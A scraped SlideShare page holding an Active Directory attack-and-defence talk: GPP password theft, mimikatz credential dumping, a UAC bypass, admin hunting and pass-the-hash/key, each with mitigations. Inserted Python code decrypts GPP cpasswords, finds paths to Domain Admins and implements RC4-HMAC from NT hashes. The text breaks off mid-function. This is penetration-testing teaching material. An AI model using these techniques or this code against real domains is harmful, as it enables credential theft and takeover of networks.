Key Trends Shaping the Future of Infrastructure.pdf
Key Trends Shaping the Future of Infrastructure.pdfKey Trends Shaping the Future of Infrastructure.pdf
Key Trends Shaping the Future of Infrastructure.pdf
Cheryl Hung
 
PCI PIN Basics Webinar from the Controlcase Team
PCI PIN Basics Webinar from the Controlcase TeamPCI PIN Basics Webinar from the Controlcase Team
PCI PIN Basics Webinar from the Controlcase Team
ControlCase
 
Assure Contact Center Experiences for Your Customers With ThousandEyes
Assure Contact Center Experiences for Your Customers With ThousandEyesAssure Contact Center Experiences for Your Customers With ThousandEyes
Assure Contact Center Experiences for Your Customers With ThousandEyes
ThousandEyes
 
Leading Change strategies and insights for effective change management pdf 1.pdf
Leading Change strategies and insights for effective change management pdf 1.pdfLeading Change strategies and insights for effective change management pdf 1.pdf
Leading Change strategies and insights for effective change management pdf 1.pdf
OnBoard
 
Builder.ai Founder Sachin Dev Duggal's Strategic Approach to Create an Innova...
Builder.ai Founder Sachin Dev Duggal's Strategic Approach to Create an Innova...Builder.ai Founder Sachin Dev Duggal's Strategic Approach to Create an Innova...
Builder.ai Founder Sachin Dev Duggal's Strategic Approach to Create an Innova...
Ramesh Iyer
 
DevOps and Testing slides at DASA Connect
DevOps and Testing slides at DASA ConnectDevOps and Testing slides at DASA Connect
DevOps and Testing slides at DASA Connect
Kari Kakkonen
 
Accelerate your Kubernetes clusters with Varnish Caching
Accelerate your Kubernetes clusters with Varnish CachingAccelerate your Kubernetes clusters with Varnish Caching
Accelerate your Kubernetes clusters with Varnish Caching
Thijs Feryn
 
Epistemic Interaction - tuning interfaces to provide information for AI support
Epistemic Interaction - tuning interfaces to provide information for AI supportEpistemic Interaction - tuning interfaces to provide information for AI support
Epistemic Interaction - tuning interfaces to provide information for AI support
Alan Dix
 
GraphRAG is All You need? LLM & Knowledge Graph
GraphRAG is All You need? LLM & Knowledge GraphGraphRAG is All You need? LLM & Knowledge Graph
GraphRAG is All You need? LLM & Knowledge Graph
Guy Korland
 
Le nuove frontiere dell'AI nell'RPA con UiPath Autopilot™
Le nuove frontiere dell'AI nell'RPA con UiPath Autopilot™Le nuove frontiere dell'AI nell'RPA con UiPath Autopilot™
Le nuove frontiere dell'AI nell'RPA con UiPath Autopilot™
UiPathCommunity
 
UiPath Test Automation using UiPath Test Suite series, part 3
UiPath Test Automation using UiPath Test Suite series, part 3UiPath Test Automation using UiPath Test Suite series, part 3
UiPath Test Automation using UiPath Test Suite series, part 3
DianaGray10
 
Generative AI Deep Dive: Advancing from Proof of Concept to Production
Generative AI Deep Dive: Advancing from Proof of Concept to ProductionGenerative AI Deep Dive: Advancing from Proof of Concept to Production
Generative AI Deep Dive: Advancing from Proof of Concept to Production
Aggregage
 
LF Energy Webinar: Electrical Grid Modelling and Simulation Through PowSyBl -...
LF Energy Webinar: Electrical Grid Modelling and Simulation Through PowSyBl -...LF Energy Webinar: Electrical Grid Modelling and Simulation Through PowSyBl -...
LF Energy Webinar: Electrical Grid Modelling and Simulation Through PowSyBl -...
DanBrown980551
 

Recently uploaded (20)

Unsubscribed: Combat Subscription Fatigue With a Membership Mentality by Head...
Unsubscribed: Combat Subscription Fatigue With a Membership Mentality by Head...Unsubscribed: Combat Subscription Fatigue With a Membership Mentality by Head...
Unsubscribed: Combat Subscription Fatigue With a Membership Mentality by Head...
 
UiPath Test Automation using UiPath Test Suite series, part 4
UiPath Test Automation using UiPath Test Suite series, part 4UiPath Test Automation using UiPath Test Suite series, part 4
UiPath Test Automation using UiPath Test Suite series, part 4
 
The Art of the Pitch: WordPress Relationships and Sales
The Art of the Pitch: WordPress Relationships and SalesThe Art of the Pitch: WordPress Relationships and Sales
The Art of the Pitch: WordPress Relationships and Sales
 
The Future of Platform Engineering
The Future of Platform EngineeringThe Future of Platform Engineering
The Future of Platform Engineering
 
Secstrike : Reverse Engineering & Pwnable tools for CTF.pptx
Secstrike : Reverse Engineering & Pwnable tools for CTF.pptxSecstrike : Reverse Engineering & Pwnable tools for CTF.pptx
Secstrike : Reverse Engineering & Pwnable tools for CTF.pptx
 
When stars align: studies in data quality, knowledge graphs, and machine lear...
When stars align: studies in data quality, knowledge graphs, and machine lear...When stars align: studies in data quality, knowledge graphs, and machine lear...
When stars align: studies in data quality, knowledge graphs, and machine lear...
 
Essentials of Automations: Optimizing FME Workflows with Parameters
Essentials of Automations: Optimizing FME Workflows with ParametersEssentials of Automations: Optimizing FME Workflows with Parameters
Essentials of Automations: Optimizing FME Workflows with Parameters
 
Key Trends Shaping the Future of Infrastructure.pdf
Key Trends Shaping the Future of Infrastructure.pdfKey Trends Shaping the Future of Infrastructure.pdf
Key Trends Shaping the Future of Infrastructure.pdf
 
PCI PIN Basics Webinar from the Controlcase Team
PCI PIN Basics Webinar from the Controlcase TeamPCI PIN Basics Webinar from the Controlcase Team
PCI PIN Basics Webinar from the Controlcase Team
 
Assure Contact Center Experiences for Your Customers With ThousandEyes
Assure Contact Center Experiences for Your Customers With ThousandEyesAssure Contact Center Experiences for Your Customers With ThousandEyes
Assure Contact Center Experiences for Your Customers With ThousandEyes
 
Leading Change strategies and insights for effective change management pdf 1.pdf
Leading Change strategies and insights for effective change management pdf 1.pdfLeading Change strategies and insights for effective change management pdf 1.pdf
Leading Change strategies and insights for effective change management pdf 1.pdf
 
Builder.ai Founder Sachin Dev Duggal's Strategic Approach to Create an Innova...
Builder.ai Founder Sachin Dev Duggal's Strategic Approach to Create an Innova...Builder.ai Founder Sachin Dev Duggal's Strategic Approach to Create an Innova...
Builder.ai Founder Sachin Dev Duggal's Strategic Approach to Create an Innova...
 
DevOps and Testing slides at DASA Connect
DevOps and Testing slides at DASA ConnectDevOps and Testing slides at DASA Connect
DevOps and Testing slides at DASA Connect
 
Accelerate your Kubernetes clusters with Varnish Caching
Accelerate your Kubernetes clusters with Varnish CachingAccelerate your Kubernetes clusters with Varnish Caching
Accelerate your Kubernetes clusters with Varnish Caching
 
Epistemic Interaction - tuning interfaces to provide information for AI support
Epistemic Interaction - tuning interfaces to provide information for AI supportEpistemic Interaction - tuning interfaces to provide information for AI support
Epistemic Interaction - tuning interfaces to provide information for AI support
 
GraphRAG is All You need? LLM & Knowledge Graph
GraphRAG is All You need? LLM & Knowledge GraphGraphRAG is All You need? LLM & Knowledge Graph
GraphRAG is All You need? LLM & Knowledge Graph
 
Le nuove frontiere dell'AI nell'RPA con UiPath Autopilot™
Le nuove frontiere dell'AI nell'RPA con UiPath Autopilot™Le nuove frontiere dell'AI nell'RPA con UiPath Autopilot™
Le nuove frontiere dell'AI nell'RPA con UiPath Autopilot™
 
UiPath Test Automation using UiPath Test Suite series, part 3
UiPath Test Automation using UiPath Test Suite series, part 3UiPath Test Automation using UiPath Test Suite series, part 3
UiPath Test Automation using UiPath Test Suite series, part 3
 
Generative AI Deep Dive: Advancing from Proof of Concept to Production
Generative AI Deep Dive: Advancing from Proof of Concept to ProductionGenerative AI Deep Dive: Advancing from Proof of Concept to Production
Generative AI Deep Dive: Advancing from Proof of Concept to Production
 
LF Energy Webinar: Electrical Grid Modelling and Simulation Through PowSyBl -...
LF Energy Webinar: Electrical Grid Modelling and Simulation Through PowSyBl -...LF Energy Webinar: Electrical Grid Modelling and Simulation Through PowSyBl -...
LF Energy Webinar: Electrical Grid Modelling and Simulation Through PowSyBl -...
 

Attacker's Perspective of Active Directory

12. Kerberos Authentication
• The Ticket Granting Ticket (TGT) contains a Privilege Attribute Certificate (PAC), which stores
  • Account name
  • Security identifiers
  • Group membership
• The user requests a TGT by sending a timestamp encrypted with his secret key (the NTLM hash when the RC4 cipher is used)
• The TGT is encrypted, and its PAC signed, with the domain KRBTGT account's secret key (NTLM hash); only a Domain Controller (DC) can read it
• A service ticket issued by the Ticket Granting Service (TGS) is encrypted with the service account's secret key (NTLM hash)
15. Privilege Escalation: User to Local Admin
• Unpatched vulnerabilities
• System misconfigurations
  • Passwords stored in SYSVOL or Group Policy Preferences (GPP)
• Check out Paul Craig's talk on local privilege escalation: http://www.vantagepoint.sg/news/48-security-wednesdays-9-local-privilege-escalation-nus-greyhats or https://pentest.blog/windows-privilege-escalation-methods-for-pentesters/
16. Passwords stored in SYSVOL
• SYSVOL
  • Domain-wide shared folder, replicated to every Domain Controller
  • Stores logon scripts and domain Group Policy objects
  • Any authenticated user on the domain can read it
• Scripts with cleartext admin credentials end up stored in SYSVOL
17. Passwords stored in SYSVOL
• Group Policy Preference that defines a password for the local Administrator account; the password is written to SYSVOL as the "cpassword" attribute of Groups.xml
18. Passwords stored in SYSVOL
• The AES encryption key is well known: Microsoft published it in the MS-GPPREF protocol specification, so anyone who can read the XML can decrypt the password
• Source: https://msdn.microsoft.com/en-us/library/2c15cbf0-f086-4c74-8b70-1f2fa45dd4be.aspx
19. Passwords stored in SYSVOL (screenshot)
20. Passwords stored in SYSVOL: Mitigation & Detection
• Install KB2962486 (MS14-025), which stops new passwords from being saved in GPP; it does not remove existing ones, so find and delete the XML files / Group Policy settings that still carry a cpassword
• Plant a decoy XML containing a "Password" in SYSVOL
• Configure a SACL on the decoy XML to audit reads, so anyone scanning SYSVOL for credentials generates an event
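The published key on slide 18 is all that is needed to turn a cpassword back into a password. As an added example in Python (not the deck's own code, nor Get-GPPPassword), the following sweeps an in-memory SYSVOL snapshot for cpassword attributes and decrypts them. The snapshot, its GPO GUIDs and the account names are constructed; the cpassword string is the widely published test vector, not a real credential; AES comes from the cryptography or pycryptodome package because the standard library has none, and decryption returns None when neither is installed.

```python
"""Find GPP cpassword values in SYSVOL and decrypt them with the published key.

Added example (not the deck's own code). It relies only on what the slides state:
GPP XML files carry a 'cpassword' attribute encrypted with AES-256-CBC under the
32-byte key Microsoft published (zero IV, UTF-16LE plaintext, PKCS#7 padding, and
the base64 '=' padding stripped). The SYSVOL snapshot below is constructed; the
cpassword value in it is the widely published test vector, not a real credential.
"""
import base64
import xml.etree.ElementTree as ET

# AES-256 key from the MSDN page the slide cites (MS-GPPREF 2.2.1.1.4).
GPP_AES_KEY = bytes.fromhex(
    "4e9906e8fcb66cc9faf49310620ffee8f496e806cc057990209b09a433b66c1b"
)

# GPP client-side extensions that can embed credentials.
GPP_FILES = {"Groups.xml", "Services.xml", "ScheduledTasks.xml",
             "DataSources.xml", "Drives.xml", "Printers.xml"}

# AES is not in the standard library; use whichever common package is present.
try:
    from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes

    def _aes_cbc_decrypt(key, data):
        dec = Cipher(algorithms.AES(key), modes.CBC(b"\x00" * 16)).decryptor()
        return dec.update(data) + dec.finalize()
except ImportError:
    try:
        from Crypto.Cipher import AES  # pycryptodome

        def _aes_cbc_decrypt(key, data):
            return AES.new(key, AES.MODE_CBC, iv=b"\x00" * 16).decrypt(data)
    except ImportError:
        _aes_cbc_decrypt = None

# Constructed SYSVOL snapshot: path -> file content (the GPO GUIDs are made up).
SAMPLE_SYSVOL = {
    r"\\corp.local\SYSVOL\corp.local\Policies\{11111111-2222-3333-4444-555555555555}"
    r"\Machine\Preferences\Groups\Groups.xml": (
        '<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}">'
        '<User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="Administrator (built-in)">'
        '<Properties action="U" userName="Administrator (built-in)" noChange="1" neverExpires="1" '
        'cpassword="j1Uyj3Vx8TY9LtLZil2uAuZkFQA/4latT76ZwgdHdhw"/>'
        '</User></Groups>'
    ),
    r"\\corp.local\SYSVOL\corp.local\Policies\{66666666-7777-8888-9999-000000000000}"
    r"\Machine\Preferences\Groups\Groups.xml": (
        '<Groups><User name="helpdesk"><Properties action="C" userName="helpdesk" cpassword=""/>'
        '</User></Groups>'
    ),
}


def find_cpasswords(sysvol):
    """Return one record per non-empty cpassword attribute found in GPP XML files."""
    hits = []
    for path, content in sysvol.items():
        if path.rsplit("\\", 1)[-1] not in GPP_FILES:
            continue
        for props in ET.fromstring(content).iter("Properties"):
            cpassword = props.get("cpassword")
            if not cpassword:        # absent or "" means no password was set
                continue
            account = props.get("userName") or props.get("accountName") or props.get("runAs")
            hits.append({"path": path, "account": account, "cpassword": cpassword})
    return hits


def decrypt_cpassword(cpassword):
    """Decrypt one cpassword; returns None when no AES implementation is installed."""
    if _aes_cbc_decrypt is None:
        return None
    raw = base64.b64decode(cpassword + "=" * (-len(cpassword) % 4))  # restore stripped '='
    plain = _aes_cbc_decrypt(GPP_AES_KEY, raw)
    plain = plain[:-plain[-1]]          # strip PKCS#7 padding
    return plain.decode("utf-16-le")


def audit_sysvol(sysvol):
    """Discovery plus decryption: the list a SYSVOL sweep puts in the report."""
    records = find_cpasswords(sysvol)
    for hit in records:
        hit["password"] = decrypt_cpassword(hit["cpassword"])
    return records


if __name__ == "__main__":
    for hit in audit_sysvol(SAMPLE_SYSVOL):
        print(f"{hit['account']!r} in {hit['path']}: {hit['password']!r}")
```

Against a real domain the same logic is pointed at \\<domain>\SYSVOL\<domain>\Policies, which every authenticated user can read; that is the slide's point. The detection counterpart is the decoy Groups.xml with a SACL: the sweep above reads every matching file, so it would trip the audit entry.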
21. Why do we need Local Privilege Escalation?
22. Why do we need to Privilege Escalate?
• To gain access to implicit trust relationship artifacts (cached credentials, tickets, tokens) that only an administrator can read
• Assume that artifacts found on one machine can be used to access other machines
• More information: http://foofus.net/goons/hinge/presos/insidious-implicit-windows-trust-relationships.pdf
23. Dump Implicit Trust Relationship Artifacts
• Dump and crack local accounts' hashes (for NTLM, the hash is as good as the password)
• Dump credentials in memory
• Dump Kerberos tickets
• Dump access tokens
24. Dump Credentials in memory (mimikatz) (screenshot)
• The Single Sign On experience ☺: the same cached secrets that make SSO work are what mimikatz reads out of LSASS
25. Dump Credentials: Mitigation
• Audit for misconfigurations that can lead to privilege escalation with windows-privesc-check (https://github.com/pentestmonkey/windows-privesc-check) or PowerUp (https://github.com/PowerShellMafia/PowerSploit/tree/master/Privesc)
• Install KB2871997 on Windows 7, 8, Server 2008 and 2012
• Deploy application whitelisting (AppLocker and Device Guard)
• Get rid of Windows Server 2003
• Have different trust levels for machines: a Domain Admin should never log on to a machine with a lower trust level
26. Dump Credentials: Detection
• Monitor the registry value "UseLogonCredential" under HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest
  • Value "1" re-enables WDigest caching of cleartext passwords in LSASS; an attacker who sets it only needs to wait for the next logon
• Honey credentials
27. Dump Credentials: Detection (Not a good idea)
• Detect mimikatz in memory using Sysmon (be careful of the performance impact)
• Look for a single process loading all of
  • C:\Windows\System32\WinSCard.dll
  • C:\Windows\System32\cryptdll.dll
  • C:\Windows\System32\hid.dll
  • C:\Windows\System32\samlib.dll
  • C:\Windows\System32\vaultcli.dll
• With LSA Protection enabled, look for mimidrv.sys (mimikatz's driver, used to turn LSA Protection off)
• More information:
  • Sysmon tutorial: https://onedrive.live.com/view.aspx?resid=D026B4699190F1E6!2843&ithint=file%2cpptx&app=PowerPoint&authkey=!AMvCRTKB_V1J5ow
  • https://medium.com/@lennartkoopmann/explaining-and-adapting-tays-sysmon-configuration-27d9719a89a8#.c8sokq3nj
  • https://cyberwardog.blogspot.sg/2017/03/chronicles-of-threat-hunter-hunting-for.html
28. Dump Credentials: Detection (screenshot)
• Source: https://twitter.com/markrussinovich/status/830997478182785024
29. Dump Credentials: Detection Bypass (screenshot)
• Source: https://twitter.com/raka_baraka/status/831040028436525056
30. User Account Control (UAC) is Enabled!
• UAC was introduced in Windows Vista
• Processes run with standard user rights even if the user is in the Administrators group, unless elevation is explicitly approved
31. UAC Bypass
• Old school
  • Privileged file copy (IFileOperation COM object)
  • DLL hijacking
  • Auto-elevation
• New school
  • Fileless UAC bypass via registry hijacking
  • Write to HKCU\Software\Classes\mscfile\shell\open\command
  • Launch eventvwr.exe, an auto-elevated binary that consults that key
• More information: https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/ and https://blog.cobaltstrike.com/2014/03/20/user-account-control-what-penetration-testers-should-know/
32. UAC Bypass: Mitigation & Detection
• Reduce the number of users with Administrator privilege
• Set the UAC level to "Always Notify" instead of the default configuration (the default can be bypassed, for example via Disk Cleanup)
• Monitor the registry key HKCU\Software\Classes\mscfile\shell\open\command
• More information: https://enigma0x3.net/2016/07/22/bypassing-uac-on-windows-10-using-disk-cleanup/
33. Situational Awareness
• Port scan
• DNS enumeration (SRV records, *._tcp.domain.com)
• Password / hash spray
• Service Principal Name (SPN) scanning
• Domain enumeration & admin hunting
• BloodHound
34. Password / Hash Spray
• Quick and dirty way to identify where a credential grants access across the network
• Good for a pen test that doesn't require stealth: every attempt is a logon event
35. Service Principal Name (SPN) Scanning
• An SPN uniquely identifies a service instance for Kerberos authentication (service class, host and optional port)
• Query them from the directory to gather the services across the domain, without a single port scanned
36. Service Principal Name (SPN) Scanning
• PowerShell scripts from Sean Metcalf: https://github.com/PyroTek3/PowerShell-AD-Recon
• Comprehensive list of SPNs: http://adsecurity.org/?page_id=183
• How SPNs are used by Kerberos: http://social.technet.microsoft.com/wiki/contents/articles/717.service-principal-names-spns-setspn-syntax-setspn-exe.aspx
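What SPN scanning actually yields is an inventory, and the same list doubles as the Kerberoasting target list. The following Python is an added example (not the deck's code, nor Sean Metcalf's scripts): it parses servicePrincipalName values into service class, host and port and flags user accounts that carry an SPN. The account list is constructed; in a real domain it would come from one LDAP query such as (servicePrincipalName=*), which touches only a Domain Controller.

```python
"""Turn servicePrincipalName values into a service inventory (added example, not the deck's code).

The account list below is constructed. In a real domain it comes from one LDAP query,
e.g. filter (servicePrincipalName=*) with attributes sAMAccountName and servicePrincipalName,
which touches only a Domain Controller, never the hosts that run the services.
"""
import collections

# (sAMAccountName, servicePrincipalName values); names ending in '$' are computer accounts.
SAMPLE_ACCOUNTS = [
    ("SQL01$", ["MSSQLSvc/sql01.corp.local:1433", "MSSQLSvc/sql01.corp.local",
                "HOST/sql01.corp.local", "HOST/SQL01", "TERMSRV/sql01.corp.local"]),
    ("svc_sql", ["MSSQLSvc/sql02.corp.local:1433", "MSSQLSvc/sql02.corp.local:INSTANCE2"]),
    ("WEB01$", ["HTTP/web01.corp.local", "HOST/web01.corp.local"]),
    ("svc_backup", ["HTTP/backup01.corp.local:8443/backupapi", "CIFS/backup01.corp.local"]),
    ("DC01$", ["ldap/dc01.corp.local/corp.local", "GC/dc01.corp.local/corp.local",
               "HOST/dc01.corp.local"]),
]


def parse_spn(spn):
    """Split 'class/host[:port][/name]'; the port field may also be an instance name."""
    service_class, _, rest = spn.partition("/")
    hostport, _, name = rest.partition("/")
    host, _, port = hostport.partition(":")
    return {"class": service_class, "host": host.lower(),
            "port": port or None, "name": name or None}


def inventory(accounts):
    """Return (services_by_host, kerberoast_candidates).

    services_by_host maps each host (as written in the SPN, so short and FQDN forms
    stay separate) to the set of service classes registered for it.
    kerberoast_candidates lists user (non-computer) accounts that carry an SPN:
    their service tickets are encrypted with a key derived from a human-chosen password.
    """
    by_host = collections.defaultdict(set)
    candidates = []
    for sam, spns in accounts:
        for spn in spns:
            parsed = parse_spn(spn)
            by_host[parsed["host"]].add(parsed["class"].upper())
        if not sam.endswith("$"):
            candidates.append(sam)
    return dict(by_host), candidates


def hosts_running(accounts, service_class):
    """Example question: which hosts run SQL Server? Answered without a port scan."""
    by_host, _ = inventory(accounts)
    return sorted(h for h, classes in by_host.items() if service_class.upper() in classes)


if __name__ == "__main__":
    by_host, candidates = inventory(SAMPLE_ACCOUNTS)
    for host in sorted(by_host):
        print(f"{host:24} {', '.join(sorted(by_host[host]))}")
    print("Kerberoast candidates:", candidates)
```

Note that HOST/ SPNs are generic (every computer account has them) and say nothing about a listening port; the interesting classes are the explicit ones such as MSSQLSvc, HTTP or TERMSRV.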
39. Domain Enumeration with PowerView
• PowerView
  • Written in PowerShell
  • Replaces the "net" commands with PowerShell equivalents
  • Calls the Win32 API directly
  • Gains network situational awareness
• More information: https://github.com/PowerShellMafia/PowerSploit/tree/master/Recon
40-43. Domain Enumeration with PowerView (screenshots)
44. Admin Hunting with PowerView
• Implicit trust relationships
• Look at where the current user has local Administrators rights
• Look for where privileged users are logged on
• Target the machines with privileged users logged on
• Steal their tokens / credentials
• Profit!
45. Admin Hunting with PowerView
• Invoke-UserHunter
  • Gets a list of hosts from AD
  • Gets the members of a specific domain group (Domain Admins, or a group granted local Administrators)
  • Runs NetSessionEnum (user sessions) and NetWkstaUserEnum (logged-on users) against each host and matches the results against the target users
  • (Optionally) checks whether the current user has local Administrators rights on each host
• More information: http://www.slideshare.net/harmj0y/i-hunt-sys-admins-20 and http://www.slideshare.net/harmj0y/i-have-the-powerview
46. Admin Hunting with PowerView (screenshot)
• Source: http://www.slideshare.net/harmj0y/i-hunt-sys-admins-20
47. Admin Hunting with PowerView (screenshot)
48. BloodHound
• Provides a graphical representation of attack paths based on information gathered with a customised PowerView
• Simplifies admin hunting across the network to achieve "derivative local admin": chaining local admin rights and logged-on sessions until a path to Domain Admin appears
• More information: https://wald0.com/?p=14, http://www.slideshare.net/AndyRobbins3/six-degrees-of-domain-admin-bloodhound-at-def-con-24 and https://github.com/BloodHoundAD/BloodHound/wiki
49. BloodHound (screenshot)
• Source: Raphael Mudge, BloodHound - Analyzing Active Directory Trust Relationships, https://www.youtube.com/watch?v=gOpsLiJFI1o
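The admin-hunting loop on slides 44-45 and BloodHound's "derivative local admin" are the same graph problem. As an added example in Python (not the deck's, PowerView's or BloodHound's code), the following builds that graph from three constructed tables (group membership, local Administrators membership per host, and sessions per host, i.e. what Get-NetGroupMember, Get-NetLocalGroup and NetSessionEnum / NetWkstaUserEnum return) and breadth-first searches for the shortest path from a low-privileged user to Domain Admins. All hosts, users and groups are made up. A session is modelled as an edge from the host to the logged-on user, because owning the host lets you steal that user's token or credentials.

```python
"""Derivative local admin: find a path from a low-privileged user to Domain Admins.

Added example, not the deck's or BloodHound's code. The three dictionaries are a
constructed snapshot of what PowerView / BloodHound collect: group membership,
local Administrators membership per host, and logged-on sessions per host.
"""
import collections

MEMBER_OF = {                       # principal -> groups (constructed)
    "corp\\alice": {"corp\\helpdesk"},
    "corp\\bob": {"corp\\it-ops"},
    "corp\\carol": {"corp\\domain admins"},
}
LOCAL_ADMINS = {                    # host -> members of its local Administrators group
    "WS01": {"corp\\helpdesk"},
    "WS02": {"corp\\helpdesk", "corp\\bob"},
    "SRV01": {"corp\\it-ops"},
    "DC01": {"corp\\domain admins"},
}
SESSIONS = {                        # host -> users with a session there
    "WS01": {"corp\\alice"},
    "WS02": {"corp\\bob"},
    "SRV01": {"corp\\carol"},       # a Domain Admin logged on to a member server
    "DC01": {"corp\\carol"},
}


def build_graph(member_of, local_admins, sessions):
    """Directed graph: node -> list of (edge_type, node)."""
    graph = collections.defaultdict(list)
    for principal, groups in member_of.items():
        for group in groups:
            graph[principal].append(("MemberOf", group))
    for host, principals in local_admins.items():
        for principal in principals:
            graph[principal].append(("AdminTo", host))
    for host, users in sessions.items():
        for user in users:
            graph[host].append(("HasSession", user))   # own the host, own the user
    return graph


def shortest_path(graph, start, target):
    """Breadth-first search; returns [(from, edge_type, to), ...] or None if unreachable."""
    previous = {start: None}
    queue = collections.deque([start])
    while queue:
        node = queue.popleft()
        if node == target:
            path = []
            while previous[node] is not None:
                parent, edge = previous[node]
                path.append((parent, edge, node))
                node = parent
            return path[::-1]
        for edge, neighbour in graph.get(node, ()):
            if neighbour not in previous:
                previous[neighbour] = (node, edge)
                queue.append(neighbour)
    return None


def path_to_domain_admin(start, member_of=MEMBER_OF, local_admins=LOCAL_ADMINS, sessions=SESSIONS):
    graph = build_graph(member_of, local_admins, sessions)
    return shortest_path(graph, start, "corp\\domain admins")


def without_session(sessions, host, user):
    """Model the tiering fix: the admin no longer logs on to that lower-tier host."""
    trimmed = {h: set(u) for h, u in sessions.items()}
    trimmed[host].discard(user)
    return trimmed


if __name__ == "__main__":
    for src, edge, dst in path_to_domain_admin("corp\\alice") or []:
        print(f"{src} -[{edge}]-> {dst}")
    fixed = without_session(SESSIONS, "SRV01", "corp\\carol")
    print("after carol stops logging on to SRV01:", path_to_domain_admin("corp\\alice", sessions=fixed))
```

The second run shows why the tiered-admin mitigation later in the deck works: removing one Domain Admin session from a member server cuts the only path, even though every local Administrators group is left exactly as it was.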
50. Domain Enumeration: Mitigation
• Use Net Cease to tighten the default NetSessionEnum permissions so ordinary users can no longer enumerate sessions: https://gallery.technet.microsoft.com/Net-Cease-Blocking-Net-1e8dcb5b
• Upgrade to Windows 10 and Windows Server 2016
• Use SAMRi10 to restrict remote SAM enumeration (Windows 10 and Server 2016 or later): https://www.bleepingcomputer.com/news/security/microsoft-researchers-release-anti-reconnaissance-tool-named-samri10/
51. Lateral Movement
• Reuse cleartext credentials (not working well after KB2871997)
• Pass the Hash (not working well after KB2871997)
• Pass the Key (overpass-the-hash)
• Impersonate tokens
• Pass the Ticket
• Kerberoasting
52. Pass the Hash (PtH) (diagram)
• Source: http://www.slideshare.net/gentilkiwi/abusing-microsoft-kerberos-sorry-you-guys-dont-get-it
53. Pass the Hash (PtH)
• Does not work as well after KB2871997
  • Local accounts other than the built-in Administrator cannot use their hash for remote admin access: UAC remote restrictions give them a filtered token over the network, and KB2871997 adds the "Local account" SIDs (S-1-5-113 / S-1-5-114) so their network logons can be denied by GPO
• PtH is still possible with
  • The default local Administrator (RID 500) hash
  • Domain account hashes
54. Pass the Key (Overpass the Hash)
• KB2871997 stops WDigest from storing cleartext credentials in memory (LSASS)
• NTLM hashes and Kerberos (e)keys are still stored in memory, because Single Sign On needs them
• Remember how a Kerberos ticket request is done?
55. Kerberos Authentication Recap (diagram)
• Source: http://www.slideshare.net/gentilkiwi/abusing-microsoft-kerberos-sorry-you-guys-dont-get-it
57. Pass the Key (Overpass the Hash)
• The user's secret key depends on the cipher used: the NTLM hash for RC4, a password-derived AES key for AES
• Exploit steps
  • Escalate privileges to local admin
  • Dump hashes / (e)keys
  • Create a new process and inject the stolen hash / (e)key into its logon session in memory
  • SSO will use the injected secret key when it requests a TGT
  • Impersonate the token of the newly created process
  • Win!
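Slide 12 says the TGT request is a timestamp encrypted with the user's secret key, "the NTLM hash for RC4", and slide 54 asks you to remember that. The following Python is an added example (not the deck's code, and not Windows or mimikatz code) that makes the link concrete: it computes the NT hash (MD4 over the UTF-16LE password, in pure Python because OpenSSL 3 often disables MD4 in hashlib), implements RFC 4757 RC4-HMAC, for which the etype 23 long-term key is exactly the NT hash, and builds the pre-authentication timestamp from the hash alone. The KDC side is a model that checks the checksum and the clock skew; the payload is a plain ISO timestamp rather than the DER-encoded PA-ENC-TS-ENC a real client sends.

```python
"""Why a stolen NT hash is enough for Kerberos (overpass-the-hash).

Added example, not from the deck; standard library only. Implements MD4 (the NT hash
is MD4 over the UTF-16LE password) and RFC 4757 RC4-HMAC, in which the long-term key
for etype 23 is exactly the NT hash. The pre-authentication payload is simplified to a
UTF-8 timestamp; a real PA-ENC-TIMESTAMP is DER-encoded. The KDC side is a model.
"""
import hashlib
import hmac
import os
import struct
from datetime import datetime, timedelta, timezone

MASK = 0xFFFFFFFF


def _md4_compress(state, block):
    X = struct.unpack("<16I", block)
    r = list(state)
    F = lambda x, y, z: (x & y) | (~x & z)
    G = lambda x, y, z: (x & y) | (x & z) | (y & z)
    H = lambda x, y, z: x ^ y ^ z
    rounds = (
        (F, 0x00000000, (3, 7, 11, 19), range(16)),
        (G, 0x5A827999, (3, 5, 9, 13), (0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15)),
        (H, 0x6ED9EBA1, (3, 9, 11, 15), (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15)),
    )
    for f, k, shifts, order in rounds:
        for i, word in enumerate(order):
            a = (-i) % 4                       # registers rotate a, d, c, b
            v = (r[a] + f(r[(a + 1) % 4], r[(a + 2) % 4], r[(a + 3) % 4]) + X[word] + k) & MASK
            s = shifts[i % 4]
            r[a] = ((v << s) | (v >> (32 - s))) & MASK
    return [(x + y) & MASK for x, y in zip(state, r)]


def md4(data):
    """RFC 1320 MD4 in pure Python (hashlib's md4 is often disabled by OpenSSL 3)."""
    padded = data + b"\x80" + b"\x00" * ((55 - len(data)) % 64) + struct.pack("<Q", 8 * len(data))
    state = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    for off in range(0, len(padded), 64):
        state = _md4_compress(state, padded[off:off + 64])
    return struct.pack("<4I", *state)


def nt_hash(password):
    """The NT hash: MD4 of the UTF-16LE password. For etype 23 it IS the Kerberos key."""
    return md4(password.encode("utf-16-le"))


def rc4(key, data):
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out, i, j = bytearray(), 0, 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(byte ^ S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


def _k1(key, usage):
    # RFC 4757 section 3: Windows sends usage 3 as 8 and 23 as 13 (impacket does the same).
    return hmac.new(key, struct.pack("<I", {3: 8, 23: 13}.get(usage, usage)), hashlib.md5).digest()


def rc4_hmac_encrypt(key, usage, plaintext, confounder=None):
    data = (confounder or os.urandom(8)) + plaintext
    k1 = _k1(key, usage)
    checksum = hmac.new(k1, data, hashlib.md5).digest()
    k3 = hmac.new(k1, checksum, hashlib.md5).digest()
    return checksum + rc4(k3, data)


def rc4_hmac_decrypt(key, usage, ciphertext):
    k1 = _k1(key, usage)
    checksum, body = ciphertext[:16], ciphertext[16:]
    data = rc4(hmac.new(k1, checksum, hashlib.md5).digest(), body)
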